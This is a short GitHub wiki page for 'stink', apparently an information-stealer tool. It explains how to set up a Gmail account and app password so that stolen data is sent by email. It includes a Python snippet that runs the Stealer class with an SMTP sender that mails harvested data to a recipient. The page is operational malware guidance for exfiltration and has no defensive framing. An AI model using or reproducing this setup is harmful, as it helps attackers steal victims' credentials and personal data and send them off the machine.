Smtp - FallenAstaroth/stink GitHub Wiki

Introduction

A guide on how to set up data sending via the Email.

Server creation example

  1. Create a Gmail account.

image

  1. Enable two-factor authentication.
  2. Create application password.

image

Example usage

from stink import Stealer, Senders

if __name__ == '__main__':
    Stealer(
        senders=[
            Senders.smtp(sender_email="YOUR_SENDER", sender_password="YOUR_APPLICATION_PASSWORD", recipient_email="YOUR_RECIPIENT")
        ]
    ).run()